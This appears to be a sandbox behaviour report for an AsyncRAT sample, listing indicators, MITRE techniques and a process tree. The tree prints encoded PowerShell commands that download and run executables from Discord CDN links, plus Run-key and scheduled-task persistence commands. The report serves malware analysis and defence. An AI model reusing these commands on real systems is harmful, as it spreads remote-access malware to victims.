asyncrat | c6dda31fa6cb4ce140f62c9ce604672fa4a9ba5d1792f2d77f3cfcb43b3227ac

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	Si9aUuEGXI.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	069Ny9YeyT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	nuSc72yKVp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	0sONKvKAqc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	V6CYedp7Jf.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	0frqJS32pW.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	ueiAOQu5Pw.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	wTKv2uf4BU.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	NAQiIfFW2x.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	1mpikpUXSB.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemGuardRuntime = "C:\\Users\\Admin\\AppData\\Roaming\\SystemGuardRuntime\\SystemGuardRuntime.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealthService = "C:\\Users\\Admin\\AppData\\Roaming\\SecurityHealthService\\SecurityHealthService.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\OperaSetups = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker\\RuntimeBroker.exe"	6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WProtecMscv = "C:\\Users\\Admin\\AppData\\Roaming\\WProtecMscv\\WProtecMscv.exe"	powershell.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{5EF49ACF-FADB-41AF-A501-60DA075A8F01}.catalogItem	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{D9BDF14A-7167-497F-9550-5FA20D094D7B}.catalogItem	svchost.exe

Suspicious use of SetThreadContext 7 IoCs

description	pid	Process	procid_target
PID 1544 set thread context of 3928	1544	RustExternal_nls.exe	75
PID 2736 set thread context of 3708	2736	2.exe	154
PID 5096 set thread context of 5840	5096	1.exe	164
PID 5928 set thread context of 6048	5928	4.exe	171
PID 5752 set thread context of 5184	5752	3.exe	176
PID 5552 set thread context of 5152	5552	8.exe	185
PID 5596 set thread context of 5868	5596	7.exe	191

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2720	5260	WerFault.exe	173

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
2928	schtasks.exe
6140	schtasks.exe
3908	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	svchost.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings	OpenWith.exe

Suspicious behavior: EnumeratesProcesses 46 IoCs

pid	Process
2372	powershell.exe
528	powershell.exe
4996	powershell.exe
3324	powershell.exe
3324	powershell.exe
1960	powershell.exe
1960	powershell.exe
2372	powershell.exe
2372	powershell.exe
2624	powershell.exe
2624	powershell.exe
868	powershell.exe
868	powershell.exe
528	powershell.exe
528	powershell.exe
4996	powershell.exe
4996	powershell.exe
3324	powershell.exe
3324	powershell.exe
4496	powershell.exe
4496	powershell.exe
1960	powershell.exe
1724	powershell.exe
1724	powershell.exe
5076	powershell.exe
5076	powershell.exe
2624	powershell.exe
868	powershell.exe
3496	powershell.exe
3496	powershell.exe
4496	powershell.exe
1724	powershell.exe
5076	powershell.exe
3496	powershell.exe
2736	2.exe
2736	2.exe
2736	2.exe
2736	2.exe
4644	powershell.exe
4644	powershell.exe
4644	powershell.exe
5984	powershell.exe
5984	powershell.exe
5984	powershell.exe
112	powershell.exe
112	powershell.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeDebugPrivilege	2372	powershell.exe
Token: SeDebugPrivilege	528	powershell.exe
Token: SeDebugPrivilege	4996	powershell.exe
Token: SeDebugPrivilege	3324	powershell.exe
Token: SeDebugPrivilege	1960	powershell.exe
Token: SeDebugPrivilege	2624	powershell.exe
Token: SeDebugPrivilege	868	powershell.exe
Token: SeDebugPrivilege	4496	powershell.exe
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeDebugPrivilege	5076	powershell.exe
Token: SeDebugPrivilege	3496	powershell.exe
Token: SeDebugPrivilege	2736	2.exe
Token: SeDebugPrivilege	4644	powershell.exe
Token: SeDebugPrivilege	5096	1.exe
Token: SeDebugPrivilege	5984	powershell.exe
Token: SeDebugPrivilege	5752	3.exe
Token: SeDebugPrivilege	112	powershell.exe
Token: SeDebugPrivilege	5152	RegAsm.exe
Token: SeDebugPrivilege	5596	7.exe
Token: SeDebugPrivilege	5868	RegAsm.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4424	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1544 wrote to memory of 3928	1544	RustExternal_nls.exe	75
PID 1544 wrote to memory of 3928	1544	RustExternal_nls.exe	75
PID 1544 wrote to memory of 3928	1544	RustExternal_nls.exe	75
PID 1544 wrote to memory of 3928	1544	RustExternal_nls.exe	75
PID 1544 wrote to memory of 3928	1544	RustExternal_nls.exe	75
PID 1544 wrote to memory of 3928	1544	RustExternal_nls.exe	75
PID 1544 wrote to memory of 3928	1544	RustExternal_nls.exe	75
PID 1544 wrote to memory of 3928	1544	RustExternal_nls.exe	75
PID 1544 wrote to memory of 3928	1544	RustExternal_nls.exe	75
PID 1544 wrote to memory of 3928	1544	RustExternal_nls.exe	75
PID 3928 wrote to memory of 3232	3928	RegAsm.exe	76
PID 3928 wrote to memory of 3232	3928	RegAsm.exe	76
PID 3232 wrote to memory of 2204	3232	DEFENDERFILESECURITY.EXE	80
PID 3232 wrote to memory of 2204	3232	DEFENDERFILESECURITY.EXE	80
PID 2204 wrote to memory of 3128	2204	cmd.exe	82
PID 2204 wrote to memory of 3128	2204	cmd.exe	82
PID 3128 wrote to memory of 1576	3128	0.exe	83
PID 3128 wrote to memory of 1576	3128	0.exe	83
PID 1576 wrote to memory of 400	1576	cmd.exe	85
PID 1576 wrote to memory of 400	1576	cmd.exe	85
PID 3128 wrote to memory of 3632	3128	0.exe	86
PID 3128 wrote to memory of 3632	3128	0.exe	86
PID 3128 wrote to memory of 4312	3128	0.exe	88
PID 3128 wrote to memory of 4312	3128	0.exe	88
PID 3632 wrote to memory of 1900	3632	cmd.exe	91
PID 3632 wrote to memory of 1900	3632	cmd.exe	91
PID 4312 wrote to memory of 4652	4312	cmd.exe	90
PID 4312 wrote to memory of 4652	4312	cmd.exe	90
PID 3128 wrote to memory of 2600	3128	0.exe	92
PID 3128 wrote to memory of 2600	3128	0.exe	92
PID 3128 wrote to memory of 2256	3128	0.exe	94
PID 3128 wrote to memory of 2256	3128	0.exe	94
PID 400 wrote to memory of 2372	400	1mpikpUXSB.exe	96
PID 400 wrote to memory of 2372	400	1mpikpUXSB.exe	96
PID 3128 wrote to memory of 2464	3128	0.exe	99
PID 3128 wrote to memory of 2464	3128	0.exe	99
PID 2600 wrote to memory of 112	2600	cmd.exe	98
PID 2600 wrote to memory of 112	2600	cmd.exe	98
PID 1900 wrote to memory of 528	1900	0sONKvKAqc.exe	101
PID 1900 wrote to memory of 528	1900	0sONKvKAqc.exe	101
PID 4652 wrote to memory of 4996	4652	V6CYedp7Jf.exe	100
PID 4652 wrote to memory of 4996	4652	V6CYedp7Jf.exe	100
PID 3128 wrote to memory of 396	3128	0.exe	104
PID 3128 wrote to memory of 396	3128	0.exe	104
PID 2256 wrote to memory of 3104	2256	cmd.exe	107
PID 2256 wrote to memory of 3104	2256	cmd.exe	107
PID 112 wrote to memory of 3324	112	0frqJS32pW.exe	143
PID 112 wrote to memory of 3324	112	0frqJS32pW.exe	143
PID 396 wrote to memory of 4264	396	cmd.exe	109
PID 396 wrote to memory of 4264	396	cmd.exe	109
PID 2464 wrote to memory of 3840	2464	cmd.exe	110
PID 2464 wrote to memory of 3840	2464	cmd.exe	110
PID 3128 wrote to memory of 1372	3128	0.exe	108
PID 3128 wrote to memory of 1372	3128	0.exe	108
PID 3128 wrote to memory of 1848	3128	0.exe	111
PID 3128 wrote to memory of 1848	3128	0.exe	111
PID 3104 wrote to memory of 1960	3104	ueiAOQu5Pw.exe	112
PID 3104 wrote to memory of 1960	3104	ueiAOQu5Pw.exe	112
PID 3128 wrote to memory of 2332	3128	0.exe	140
PID 3128 wrote to memory of 2332	3128	0.exe	140
PID 3840 wrote to memory of 2624	3840	nuSc72yKVp.exe	115
PID 3840 wrote to memory of 2624	3840	nuSc72yKVp.exe	115
PID 1372 wrote to memory of 3708	1372	cmd.exe	154
PID 1372 wrote to memory of 3708	1372	cmd.exe	154

C:\Users\Admin\AppData\Local\Temp\RustExternal_nls.exe
"C:\Users\Admin\AppData\Local\Temp\RustExternal_nls.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1544
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  #cmd
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3928
- - C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE
    "C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3232
  - - C:\Windows\system32\cmd.exe
      "cmd" /C C:\Users\Admin\AppData\Local\Temp\0.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2204
    - - C:\Users\Admin\AppData\Local\Temp\0.exe
        
        C:\Users\Admin\AppData\Local\Temp\0.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3128
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\1mpikpUXSB.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1576
        
        C:\Users\Admin\AppData\Local\Temp\1mpikpUXSB.exe
        
        C:\Users\Admin\AppData\Local\Temp\1mpikpUXSB.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:400
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAbgBuACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADUANQA2ADAANAA2ADUANAA0ADQANgAyADIAMwAzADcAMAAvADEAMAA1ADUANgAwADQANwA3ADUAMAAwADMAMAA5ADkAMQA4ADYALwBwAGwAbABtAG0AZABpAGkAcABtAC4AZQB4AGUAJwAsACAAPAAjAHAAZgB2ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagB3AG0AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAegB2AGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAuAGUAeABlACcAKQApADwAIwBuAGUAZgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGsAagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbgBuAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAuAGUAeABlACcAKQA8ACMAYQBjAHAAIwA+AA=="
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2372
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "C:\Users\Admin\AppData\Roaming\1.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:5096
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        10⤵
        
        PID:5840
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\0sONKvKAqc.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3632
        
        C:\Users\Admin\AppData\Local\Temp\0sONKvKAqc.exe
        
        C:\Users\Admin\AppData\Local\Temp\0sONKvKAqc.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:1900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AZwBnACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQA1ADYAMAA0ADYANQA0ADQANAA2ADIAMgAzADMANwAwAC8AMQAwADUANQA2ADAANAA3ADkAMgAzADMAOAAxADYANQA4ADEAMAAvAEMAUgAuAGUAeABlACcALAAgADwAIwBnAHgAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAeQBwACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHYAbQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIALgBlAHgAZQAnACkAKQA8ACMAZAB4AHMAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABkAHMAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAcAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIALgBlAHgAZQAnACkAPAAjAGMAaQBnACMAPgA="
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:528
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "C:\Users\Admin\AppData\Roaming\2.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2736
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\V6CYedp7Jf.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4312
        
        C:\Users\Admin\AppData\Local\Temp\V6CYedp7Jf.exe
        
        C:\Users\Admin\AppData\Local\Temp\V6CYedp7Jf.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:4652
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAawBkACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQA1ADYAMAA0ADYANQA0ADQANAA2ADIAMgAzADMANwAwAC8AMQAwADUANQA2ADAANAA4ADcAMgA2ADgAMAAwADUANAA4ADQANQAvAGwAYwBvAG0AcABsAGMAbQBwAG8ALgBlAHgAZQAnACwAIAA8ACMAZQBmAHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBsAHQAbgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBwAHAAbgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAzAC4AZQB4AGUAJwApACkAPAAjAGwAegBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHEAZwB5ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBiAHkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAzAC4AZQB4AGUAJwApADwAIwB0AG4AeAAjAD4A"
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4996
        
        C:\Users\Admin\AppData\Roaming\3.exe
        
        "C:\Users\Admin\AppData\Roaming\3.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:5752
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        10⤵
        
        PID:5184
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\0frqJS32pW.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2600
        
        C:\Users\Admin\AppData\Local\Temp\0frqJS32pW.exe
        
        C:\Users\Admin\AppData\Local\Temp\0frqJS32pW.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAcQB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQA1ADYAMAA0ADYANQA0ADQANAA2ADIAMgAzADMANwAwAC8AMQAwADUANQA2ADAANAA4ADgAOQA3ADYAMwA0ADUAMAA4ADkAMAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwAsACAAPAAjAGwAdwBuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcwBmAGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBkAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANAAuAGUAeABlACcAKQApADwAIwByAGIAaQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AGIAagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZQBxAHYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANAAuAGUAeABlACcAKQA8ACMAegBpAGYAIwA+AA=="
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3324
        
        C:\Users\Admin\AppData\Roaming\4.exe
        
        "C:\Users\Admin\AppData\Roaming\4.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5928
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'
        10⤵
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5984
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        10⤵
        
        PID:5996
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        11⤵
        Creates scheduled task(s)
        
        PID:6140
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        #cmd
        10⤵
        
        PID:6048
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\ueiAOQu5Pw.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2256
        
        C:\Users\Admin\AppData\Local\Temp\ueiAOQu5Pw.exe
        
        C:\Users\Admin\AppData\Local\Temp\ueiAOQu5Pw.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:3104
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQB0ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQA1ADYAMAA0ADYANQA0ADQANAA2ADIAMgAzADMANwAwAC8AMQAwADUANQA2ADAANAA5ADIANwAzADAANgA2ADcAOAAzADAAMgAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAB0AFMAYwByAGUAZQBuAC4AZQB4AGUAJwAsACAAPAAjAG0AaABwACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABkAGsAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdQBoAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANQAuAGUAeABlACcAKQApADwAIwBoAHIAdAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBuAHUAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAegBiAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANQAuAGUAeABlACcAKQA8ACMAaQB0AHAAIwA+AA=="
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1960
        
        C:\Users\Admin\AppData\Roaming\5.exe
        
        "C:\Users\Admin\AppData\Roaming\5.exe"
        9⤵
        Executes dropped EXE
        
        PID:5260
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5260 -s 804
        10⤵
        Program crash
        
        PID:2720
      - C:\Windows\system32\cmd.exe
        
        "cmd" /C C:\Users\Admin\AppData\Local\Temp\nuSc72yKVp.exe
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2464
        
        C:\Users\Admin\AppData\Local\Temp\nuSc72yKVp.exe
        
        C:\Users\Admin\AppData\Local\Temp\nuSc72yKVp.exe
        7⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:3840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
